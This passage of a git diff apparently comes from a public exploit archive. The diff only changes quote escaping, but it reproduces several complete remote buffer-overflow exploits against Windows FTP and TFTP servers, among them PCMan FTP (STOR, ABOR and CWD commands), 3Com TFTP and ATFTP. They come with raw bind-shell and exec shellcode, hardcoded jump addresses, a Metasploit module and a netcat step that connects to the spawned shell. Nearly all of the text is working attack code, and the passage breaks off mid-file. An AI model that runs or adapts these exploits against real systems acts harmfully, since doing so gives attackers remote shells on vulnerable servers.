 # 7C86467B   FFE4             JMP ESP
 # JMP ESP KERNEL32.DLL
-garbage= \'\\x41\' * 2005
-jmpesp= \'\\x7B\\x46\\x86\\x7C\'
-fixstack= \'\\x83\\xc4\\x9c\'
-vulparameter= \'/../\'
-nop=\'\\x90\' *4
+garbage= '\x41' * 2005
+jmpesp= '\x7B\x46\x86\x7C'
+fixstack= '\x83\xc4\x9c'
+vulparameter= '/../'
+nop='\x90' *4
 
 buffer = garbage + jmpesp + nop + fixstack + shellcode
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-print \"[+] Connect to %s on port %d\" % (target,port)
+print "[+] Connect to %s on port %d" % (target,port)
 try:
 	s.connect((target,port))
         s.recv(1024)
-	s.send(\'USER anonymous\\r\\n\') 
+	s.send('USER anonymous\r\n') 
 	s.recv(1024)
-	s.send(\'PASS polunchis\\r\\n\')
+	s.send('PASS polunchis\r\n')
 	s.recv(1024)
-	s.send(\"STOR \" + vulparameter + buffer + \"\\r\\n\")
-        print \"[+] Sending payload of size\", len(buffer) 
+	s.send("STOR " + vulparameter + buffer + "\r\n")
+        print "[+] Sending payload of size", len(buffer) 
 	s.close()
-	print \"[+] Exploit Sent Successfully\"
-	print \"[+] Waiting for 5 sec before spawning shell to \" + target + \":28876\\r\"
-	print \"\\r\"
+	print "[+] Exploit Sent Successfully"
+	print "[+] Waiting for 5 sec before spawning shell to " + target + ":28876\r"
+	print "\r"
 	time.sleep(5)
-	os.system (\"nc -n \" + target + \" 28876\")
-	print \"[-] Connection lost from \" + target + \":28876 \\r\"
+	os.system ("nc -n " + target + " 28876")
+	print "[-] Connection lost from " + target + ":28876 \r"
 except:
-	print \"[-] Could not connect to \" + target + \":21\\r\"
+	print "[-] Could not connect to " + target + ":21\r"
         sys.exit(0) 
diff --git a/platforms/windows/remote/28328.rb b/platforms/windows/remote/28328.rb
index f4d9696a1..7f8e72d47 100755
--- a/platforms/windows/remote/28328.rb
+++ b/platforms/windows/remote/28328.rb
@@ -5,7 +5,7 @@
 #   http://metasploit.com/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -14,49 +14,49 @@ class Metasploit3 < Msf::Exploit::Remote
 	
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'PCMAN FTP Server STOR Command Stack Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
+			'Description'    => %q{
 						This module exploits a buffer overflow vulnerability
 						found in the STOR command of the PCMAN FTP v2.07 Server
-						when the \"/../\" parameters are also sent to the server.
+						when the "/../" parameters are also sent to the server.
 			},
-			\'Author\'         => [
-						\'Christian (Polunchis) Ramirez\',	# Initial Discovery
-						\'Rick (nanotechz9l) Flores\',		# Metasploit Module                             
+			'Author'         => [
+						'Christian (Polunchis) Ramirez',	# Initial Discovery
+						'Rick (nanotechz9l) Flores',		# Metasploit Module                             
 					],
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: $\',
-			\'References\'     =>
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
 				[
-					[ \'URL\', \'http://www.exploit-db.com/exploits/27703/\' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'process\',
+					'EXITFUNC' => 'process',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\' 		=> 1000,
-					\'BadChars\' 		=> \"\\x00\\xff\\x0a\\x0d\\x20\\x40\",
+					'Space' 		=> 1000,
+					'BadChars' 		=> "\x00\xff\x0a\x0d\x20\x40",
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Windows XP SP3\', 
+					[ 'Windows XP SP3', 
 						{ 
-							\'Ret\' => 0x7C91FCD8, # jmp esp from kernel32.dll
-							\'Offset\' => 2002
+							'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
+							'Offset' => 2002
 						} 
 					],
 				],
-			\'DisclosureDate\' => \'Jul 17 2011\',
-			\'DefaultTarget\'	=> 0))
+			'DisclosureDate' => 'Jul 17 2011',
+			'DefaultTarget'	=> 0))
 	end
 	
 	def check
 	connect
 	disconnect
-	if (banner =~ /220 PCMan\'s FTP Server 2.0/)
+	if (banner =~ /220 PCMan's FTP Server 2.0/)
 		return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
@@ -64,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		connect_login
-		print_status(\"Trying victim #{target.name}...\")		
-		sploit = \"\\x41\" * 2002 + [target.ret].pack(\'V\') + make_nops(4) + \"\\x83\\xc4\\x9c\" + payload.encoded
+		print_status("Trying victim #{target.name}...")		
+		sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
 		sploit << make_nops(4)
 		sploit << payload.encoded
-		send_cmd( [\'STOR\', \'/../\' + sploit], false )
+		send_cmd( ['STOR', '/../' + sploit], false )
 		handler
 		disconnect
 	end
diff --git a/platforms/windows/remote/2865.rb b/platforms/windows/remote/2865.rb
index 5971408c8..df46eb410 100755
--- a/platforms/windows/remote/2865.rb
+++ b/platforms/windows/remote/2865.rb
@@ -11,34 +11,34 @@
 # ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
 # Default port is 69 if not specified
 
-require \'socket\'
+require 'socket'
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
 
-sc1 = \"\\x2b\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x02\"
-sc1 += \"\\xaf\\xbb\\x16\\x83\\xeb\\xfc\\xe2\\xf4\\xfe\\xc5\\x50\\x5b\\xea\\x56\\x44\\xe9\"
-sc1 +=\"\\xfd\\xcf\\x30\\x7a\\x26\\x8b\\x30\\x53\\x3e\\x24\\xc7\\x13\\x7a\\xae\\x54\\x9d\"
-sc1 +=\"\\x4d\\xb7\\x30\\x49\\x22\\xae\\x50\\x5f\\x89\\x9b\\x30\\x17\\xec\\x9e\\x7b\\x8f\"
-sc1 +=\"\\xae\\x2b\\x7b\\x62\\x05\\x6e\\x71\\x1b\\x03\\x6d\\x50\\xe2\\x39\\xfb\\x9f\\x3e\"
-sc1 +=\"\\x77\\x4a\\x30\\x49\\x26\\xae\\x50\\x70\\x89\\xa3\\xf0\\x9d\\x5d\\xb3\\xba\\xfd\"
-sc1 +=\"\\x01\\x83\\x30\\x9f\\x6e\\x8b\\xa7\\x77\\xc1\\x9e\\x60\\x72\\x89\\xec\\x8b\\x9d\"
-sc1 +=\"\\x42\\xa3\\x30\\x66\\x1e\\x02\\x30\\x56\\x0a\\xf1\\xd3\\x98\\x4c\\xa1\\x57\\x46\"
-sc1 +=\"\\xfd\\x79\\xdd\\x45\\x64\\xc7\\x88\\x24\\x6a\\xd8\\xc8\\x24\\x5d\\xfb\\x44\\xc6\"
-sc1 +=\"\\x6a\\x64\\x56\\xea\\x39\\xff\\x44\\xc0\\x5d\\x26\\x5e\\x70\\x83\\x42\\xb3\\x14\"
-sc1 +=\"\\x57\\xc5\\xb9\\xe9\\xd2\\xc7\\x62\\x1f\\xf7\\x02\\xec\\xe9\\xd4\\xfc\\xe8\\x45\"
-sc1 +=\"\\x51\\xfc\\xf8\\x45\\x41\\xfc\\x44\\xc6\\x64\\xc7\\xaa\\x4a\\x64\\xfc\\x32\\xf7\"
-sc1 +=\"\\x97\\xc7\\x1f\\x0c\\x72\\x68\\xec\\xe9\\xd4\\xc5\\xab\\x47\\x57\\x50\\x6b\\x7e\"
-sc1 +=\"\\xa6\\x02\\x95\\xff\\x55\\x50\\x6d\\x45\\x57\\x50\\x6b\\x7e\\xe7\\xe6\\x3d\\x5f\"
-sc1 +=\"\\x55\\x50\\x6d\\x46\\x56\\xfb\\xee\\xe9\\xd2\\x3c\\xd3\\xf1\\x7b\\x69\\xc2\\x41\"
-sc1 +=\"\\xfd\\x79\\xee\\xe9\\xd2\\xc9\\xd1\\x72\\x64\\xc7\\xd8\\x7b\\x8b\\x4a\\xd1\\x46\"
-sc1 +=\"\\x5b\\x86\\x77\\x9f\\xe5\\xc5\\xff\\x9f\\xe0\\x9e\\x7b\\xe5\\xa8\\x51\\xf9\\x3b\"
-sc1 +=\"\\xfc\\xed\\x97\\x85\\x8f\\xd5\\x83\\xbd\\xa9\\x04\\xd3\\x64\\xfc\\x1c\\xad\\xe9\"
-sc1 +=\"\\x77\\xeb\\x44\\xc0\\x59\\xf8\\xe9\\x47\\x53\\xfe\\xd1\\x17\\x53\\xfe\\xee\\x47\"
-sc1 +=\"\\xfd\\x7f\\xd3\\xbb\\xdb\\xaa\\x75\\x45\\xfd\\x79\\xd1\\xe9\\xfd\\x98\\x44\\xc6\"
-sc1 +=\"\\x89\\xf8\\x47\\x95\\xc6\\xcb\\x44\\xc0\\x50\\x50\\x6b\\x7e\\xf2\\x25\\xbf\\x49\"
-sc1 +=\"\\x51\\x50\\x6d\\xe9\\xd2\\xaf\\xbb\\x16\"
+sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
+sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
+sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
+sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
+sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e"
+sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd"
+sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d"
+sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46"
+sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6"
+sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14"
+sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45"
+sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7"
+sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e"
+sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f"
+sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41"
+sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46"
+sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b"
+sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9"
+sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47"
+sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6"
+sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49"
+sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"
 
-jmp = \"\\x63\\x20\\xdc\\x77\" # jmp esi user32.dll xp sp 2 english
+jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english
 
 host = ARGV[0]
 port = 69
@@ -49,22 +49,22 @@ end
 
 sock = UDPSocket.new()
 
-puts \"[+]Trying to connect to #{host}\"
+puts "[+]Trying to connect to #{host}"
 if (not sock.connect(host,port))
-	raise \"Unable to connect to #{host}\"
+	raise "Unable to connect to #{host}"
 end
 
-exploit  = \"\\x00\\x02\"
-exploit += \"a\"
-exploit += \"\\x00\"
-exploit += \"\\x90\"* 129 
+exploit  = "\x00\x02"
+exploit += "a"
+exploit += "\x00"
+exploit += "\x90"* 129 
 exploit += sc1 
 exploit += jmp
-exploit += \"\\x00\"
+exploit += "\x00"
 
-puts \"[+] Connected ... Sending exploit to victim\"
+puts "[+] Connected ... Sending exploit to victim"
 sock.send exploit,0
 
-puts \"[+] Exploit sended.. Now telnet on port 4444 for your shell\"
+puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"
 
 # milw0rm.com [2006-11-30]
diff --git a/platforms/windows/remote/2887.pl b/platforms/windows/remote/2887.pl
index 951094596..24222c07c 100755
--- a/platforms/windows/remote/2887.pl
+++ b/platforms/windows/remote/2887.pl
@@ -10,49 +10,49 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print \\\"Uso: atftp-19.pl <victim> <port>\\\\n\\\\n\\\";
+ print "Uso: atftp-19.pl <victim> <port>\n\n";
  exit;
 }
 
 
 
-$victim = IO::Socket::INET->new(Proto=>\\\'udp\\\',
+$victim = IO::Socket::INET->new(Proto=>'udp',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                            or die \\\"Cannot connect to $ARGV[0] sulla porta $ARGV[1]\\\";
-$pad = \\\"\\\\x90\\\"x63;
+                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
+$pad = "\x90"x63;
 
 # win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
 
-$shellcode = \\\"\\\\x33\\\\xc9\\\\x83\\\\xe9\\\\xdd\\\\xd9\\\\xee\\\\xd9\\\\x74\\\\x24\\\\xf4\\\\x5b\\\\x81\\\\x73\\\\x13\\\\xf1\\\".
-\\\"\\\\xf1\\\\x59\\\\x06\\\\x83\\\\xeb\\\\xfc\\\\xe2\\\\xf4\\\\x0d\\\\x19\\\\x1d\\\\x06\\\\xf1\\\\xf1\\\\xd2\\\\x43\\\".
-\\\"\\\\xcd\\\\x7a\\\\x25\\\\x03\\\\x89\\\\xf0\\\\xb6\\\\x8d\\\\xbe\\\\xe9\\\\xd2\\\\x59\\\\xd1\\\\xf0\\\\xb2\\\\x4f\\\".
-\\\"\\\\x7a\\\\xc5\\\\xd2\\\\x07\\\\x1f\\\\xc0\\\\x99\\\\x9f\\\\x5d\\\\x75\\\\x99\\\\x72\\\\xf6\\\\x30\\\\x93\\\\x0b\\\".
-\\\"\\\\xf0\\\\x33\\\\xb2\\\\xf2\\\\xca\\\\xa5\\\\x7d\\\\x02\\\\x84\\\\x14\\\\xd2\\\\x59\\\\xd5\\\\xf0\\\\xb2\\\\x60\\\".
-\\\"\\\\x7a\\\\xfd\\\\x12\\\\x8d\\\\xae\\\\xed\\\\x58\\\\xed\\\\x7a\\\\xed\\\\xd2\\\\x07\\\\x1a\\\\x78\\\\x05\\\\x22\\\".
-\\\"\\\\xf5\\\\x32\\\\x68\\\\xc6\\\\x95\\\\x7a\\\\x19\\\\x36\\\\x74\\\\x31\\\\x21\\\\x0a\\\\x7a\\\\xb1\\\\x55\\\\x8d\\\".
-\\\"\\\\x81\\\\xed\\\\xf4\\\\x8d\\\\x99\\\\xf9\\\\xb2\\\\x0f\\\\x7a\\\\x71\\\\xe9\\\\x06\\\\xf1\\\\xf1\\\\xd2\\\\x6e\\\".
-\\\"\\\\xcd\\\\xae\\\\x68\\\\xf0\\\\x91\\\\xa7\\\\xd0\\\\xfe\\\\x72\\\\x31\\\\x22\\\\x56\\\\x99\\\\x01\\\\xd3\\\\x02\\\".
-\\\"\\\\xae\\\\x99\\\\xc1\\\\xf8\\\\x7b\\\\xff\\\\x0e\\\\xf9\\\\x16\\\\x92\\\\x38\\\\x6a\\\\x92\\\\xdf\\\\x3c\\\\x7e\\\".
-\\\"\\\\x94\\\\xf1\\\\x59\\\\x06\\\";
+$shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf1".
+"\xf1\x59\x06\x83\xeb\xfc\xe2\xf4\x0d\x19\x1d\x06\xf1\xf1\xd2\x43".
+"\xcd\x7a\x25\x03\x89\xf0\xb6\x8d\xbe\xe9\xd2\x59\xd1\xf0\xb2\x4f".
+"\x7a\xc5\xd2\x07\x1f\xc0\x99\x9f\x5d\x75\x99\x72\xf6\x30\x93\x0b".
+"\xf0\x33\xb2\xf2\xca\xa5\x7d\x02\x84\x14\xd2\x59\xd5\xf0\xb2\x60".
+"\x7a\xfd\x12\x8d\xae\xed\x58\xed\x7a\xed\xd2\x07\x1a\x78\x05\x22".
+"\xf5\x32\x68\xc6\x95\x7a\x19\x36\x74\x31\x21\x0a\x7a\xb1\x55\x8d".
+"\x81\xed\xf4\x8d\x99\xf9\xb2\x0f\x7a\x71\xe9\x06\xf1\xf1\xd2\x6e".
+"\xcd\xae\x68\xf0\x91\xa7\xd0\xfe\x72\x31\x22\x56\x99\x01\xd3\x02".
+"\xae\x99\xc1\xf8\x7b\xff\x0e\xf9\x16\x92\x38\x6a\x92\xdf\x3c\x7e".
+"\x94\xf1\x59\x06";
 
-#$eip=\\\"\\\\x42\\\\x42\\\\x42\\\\x42\\\";
-$eip=\\\"\\\\xf4\\\\xf5\\\\xe3\\\\x75\\\";	#call [ESP+28] in IMM32.dll on win2k Server SP4 Italian 
+#$eip="\x42\x42\x42\x42";
+$eip="\xf4\xf5\xe3\x75";	#call [ESP+28] in IMM32.dll on win2k Server SP4 Italian 
 
 
 
-$mode = \\\"netascii\\\";
+$mode = "netascii";
 
-$exploit = \\\"\\\\x00\\\\x02\\\" . $pad . $shellcode . $eip . \\\"\\\\0\\\"  . $mode . \\\"\\\\0\\\";
+$exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0"  . $mode . "\0";
 
 
 print $victim $exploit;
 
-print \\\" + Malicious request sent ...\\\\n\\\";
+print " + Malicious request sent ...\n";
 
 sleep(2);
 
-print \\\"Done.\\\\n\\\";
+print "Done.\n";
 
 close($victim);
 exit;
diff --git a/platforms/windows/remote/31254.py b/platforms/windows/remote/31254.py
index 5c1f68150..5c489c400 100755
--- a/platforms/windows/remote/31254.py
+++ b/platforms/windows/remote/31254.py
@@ -8,56 +8,56 @@ import socket as s
 from sys import argv
 #
 if(len(argv) != 4):
-    print \"USAGE: %s host <user> <password>\" % argv[0]
+    print "USAGE: %s host <user> <password>" % argv[0]
     exit(1)
 else:
     #store command line arguments
     script,host,fuser,fpass=argv
     #vars
-    junk = \'\\x41\' * 2011 #overwrite function (ABOR) with garbage/junk chars
-    espaddress = \'\\x59\\x06\\xbb\\x76\' # 76BB0659
-    nops = \'\\x90\' * 10
+    junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
+    espaddress = '\x59\x06\xbb\x76' # 76BB0659
+    nops = '\x90' * 10
     shellcode = ( # BIND SHELL | PORT 4444
-        \"\\x31\\xc9\\xdb\\xcd\\xbb\\xb3\\x93\\x96\\x9d\\xb1\\x56\\xd9\\x74\\x24\\xf4\"
-        \"\\x5a\\x31\\x5a\\x17\\x83\\xea\\xfc\\x03\\x5a\\x13\\x51\\x66\\x6a\\x75\\x1c\"
-        \"\\x89\\x93\\x86\\x7e\\x03\\x76\\xb7\\xac\\x77\\xf2\\xea\\x60\\xf3\\x56\\x07\"
-        \"\\x0b\\x51\\x43\\x9c\\x79\\x7e\\x64\\x15\\x37\\x58\\x4b\\xa6\\xf6\\x64\\x07\"
-        \"\\x64\\x99\\x18\\x5a\\xb9\\x79\\x20\\x95\\xcc\\x78\\x65\\xc8\\x3f\\x28\\x3e\"
-        \"\\x86\\x92\\xdc\\x4b\\xda\\x2e\\xdd\\x9b\\x50\\x0e\\xa5\\x9e\\xa7\\xfb\\x1f\"
-        \"\\xa0\\xf7\\x54\\x14\\xea\\xef\\xdf\\x72\\xcb\\x0e\\x33\\x61\\x37\\x58\\x38\"
-        \"\\x51\\xc3\\x5b\\xe8\\xa8\\x2c\\x6a\\xd4\\x66\\x13\\x42\\xd9\\x77\\x53\\x65\"
-        \"\\x02\\x02\\xaf\\x95\\xbf\\x14\\x74\\xe7\\x1b\\x91\\x69\\x4f\\xef\\x01\\x4a\"
-        \"\\x71\\x3c\\xd7\\x19\\x7d\\x89\\x9c\\x46\\x62\\x0c\\x71\\xfd\\x9e\\x85\\x74\"
-        \"\\xd2\\x16\\xdd\\x52\\xf6\\x73\\x85\\xfb\\xaf\\xd9\\x68\\x04\\xaf\\x86\\xd5\"
-        \"\\xa0\\xbb\\x25\\x01\\xd2\\xe1\\x21\\xe6\\xe8\\x19\\xb2\\x60\\x7b\\x69\\x80\"
-        \"\\x2f\\xd7\\xe5\\xa8\\xb8\\xf1\\xf2\\xcf\\x92\\x45\\x6c\\x2e\\x1d\\xb5\\xa4\"
-        \"\\xf5\\x49\\xe5\\xde\\xdc\\xf1\\x6e\\x1f\\xe0\\x27\\x20\\x4f\\x4e\\x98\\x80\"
-        \"\\x3f\\x2e\\x48\\x68\\x2a\\xa1\\xb7\\x88\\x55\\x6b\\xce\\x8f\\x9b\\x4f\\x82\"
-        \"\\x67\\xde\\x6f\\x34\\x2b\\x57\\x89\\x5c\\xc3\\x31\\x01\\xc9\\x21\\x66\\x9a\"
-        \"\\x6e\\x5a\\x4c\\xb6\\x27\\xcc\\xd8\\xd0\\xf0\\xf3\\xd8\\xf6\\x52\\x58\\x70\"
-        \"\\x91\\x20\\xb2\\x45\\x80\\x36\\x9f\\xed\\xcb\\x0e\\x77\\x67\\xa2\\xdd\\xe6\"
-        \"\\x78\\xef\\xb6\\x8b\\xeb\\x74\\x47\\xc2\\x17\\x23\\x10\\x83\\xe6\\x3a\\xf4\"
-        \"\\x39\\x50\\x95\\xeb\\xc0\\x04\\xde\\xa8\\x1e\\xf5\\xe1\\x31\\xd3\\x41\\xc6\"
-        \"\\x21\\x2d\\x49\\x42\\x16\\xe1\\x1c\\x1c\\xc0\\x47\\xf7\\xee\\xba\\x11\\xa4\"
-        \"\\xb8\\x2a\\xe4\\x86\\x7a\\x2d\\xe9\\xc2\\x0c\\xd1\\x5b\\xbb\\x48\\xed\\x53\"
-        \"\\x2b\\x5d\\x96\\x8e\\xcb\\xa2\\x4d\\x0b\\xfb\\xe8\\xcc\\x3d\\x94\\xb4\\x84\"
-        \"\\x7c\\xf9\\x46\\x73\\x42\\x04\\xc5\\x76\\x3a\\xf3\\xd5\\xf2\\x3f\\xbf\\x51\"
-        \"\\xee\\x4d\\xd0\\x37\\x10\\xe2\\xd1\\x1d\\x1a\\xcd\")
+        "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
+        "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
+        "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
+        "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
+        "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
+        "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
+        "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
+        "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
+        "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
+        "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
+        "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
+        "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
+        "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
+        "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
+        "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
+        "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
+        "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
+        "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
+        "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
+        "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
+        "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
+        "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
+        "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
+        "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
+        "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
     sploit = junk+espaddress+nops+shellcode
     #create socket
     conn = s.socket(s.AF_INET,s.SOCK_STREAM)
     #establish connection to server
     conn.connect((host,21))
     #post ftp user
-    conn.send(\'USER \'+fuser+\'\\r\\n\')
+    conn.send('USER '+fuser+'\r\n')
     #wait for response
     uf = conn.recv(1024)
     #post ftp password
-    conn.send(\'PASS \'+fpass+\'\\r\\n\')
+    conn.send('PASS '+fpass+'\r\n')
     #wait for response
     pf = conn.recv(1024)
     #send ftp command with sploit
-    conn.send(\'ABOR \'+sploit+\'\\r\\n\')
+    conn.send('ABOR '+sploit+'\r\n')
     cf = conn.recv(1024)
     #close connection
     conn.close()
diff --git a/platforms/windows/remote/31255.py b/platforms/windows/remote/31255.py
index 23a10be83..f8fa843ec 100755
--- a/platforms/windows/remote/31255.py
+++ b/platforms/windows/remote/31255.py
@@ -8,56 +8,56 @@ import socket as s
 from sys import argv
 #
 if(len(argv) != 4):
-    print \"USAGE: %s host <user> <password>\" % argv[0]
+    print "USAGE: %s host <user> <password>" % argv[0]
     exit(1)
 else:
     #store command line arguments
     script,host,fuser,fpass=argv
     #vars
-    junk = \'\\x41\' * 2012 #overwrite function (CWD) with garbage/junk chars
-    espaddress = \'\\x59\\x06\\xbb\\x76\' # 76BB0659
-    nops = \'\\x90\' * 10
+    junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
+    espaddress = '\x59\x06\xbb\x76' # 76BB0659
+    nops = '\x90' * 10
     shellcode = ( # BIND SHELL | PORT 4444
-        \"\\x31\\xc9\\xdb\\xcd\\xbb\\xb3\\x93\\x96\\x9d\\xb1\\x56\\xd9\\x74\\x24\\xf4\"
-        \"\\x5a\\x31\\x5a\\x17\\x83\\xea\\xfc\\x03\\x5a\\x13\\x51\\x66\\x6a\\x75\\x1c\"
-        \"\\x89\\x93\\x86\\x7e\\x03\\x76\\xb7\\xac\\x77\\xf2\\xea\\x60\\xf3\\x56\\x07\"
-        \"\\x0b\\x51\\x43\\x9c\\x79\\x7e\\x64\\x15\\x37\\x58\\x4b\\xa6\\xf6\\x64\\x07\"
-        \"\\x64\\x99\\x18\\x5a\\xb9\\x79\\x20\\x95\\xcc\\x78\\x65\\xc8\\x3f\\x28\\x3e\"
-        \"\\x86\\x92\\xdc\\x4b\\xda\\x2e\\xdd\\x9b\\x50\\x0e\\xa5\\x9e\\xa7\\xfb\\x1f\"
-        \"\\xa0\\xf7\\x54\\x14\\xea\\xef\\xdf\\x72\\xcb\\x0e\\x33\\x61\\x37\\x58\\x38\"
-        \"\\x51\\xc3\\x5b\\xe8\\xa8\\x2c\\x6a\\xd4\\x66\\x13\\x42\\xd9\\x77\\x53\\x65\"
-        \"\\x02\\x02\\xaf\\x95\\xbf\\x14\\x74\\xe7\\x1b\\x91\\x69\\x4f\\xef\\x01\\x4a\"
-        \"\\x71\\x3c\\xd7\\x19\\x7d\\x89\\x9c\\x46\\x62\\x0c\\x71\\xfd\\x9e\\x85\\x74\"
-        \"\\xd2\\x16\\xdd\\x52\\xf6\\x73\\x85\\xfb\\xaf\\xd9\\x68\\x04\\xaf\\x86\\xd5\"
-        \"\\xa0\\xbb\\x25\\x01\\xd2\\xe1\\x21\\xe6\\xe8\\x19\\xb2\\x60\\x7b\\x69\\x80\"
-        \"\\x2f\\xd7\\xe5\\xa8\\xb8\\xf1\\xf2\\xcf\\x92\\x45\\x6c\\x2e\\x1d\\xb5\\xa4\"
-        \"\\xf5\\x49\\xe5\\xde\\xdc\\xf1\\x6e\\x1f\\xe0\\x27\\x20\\x4f\\x4e\\x98\\x80\"
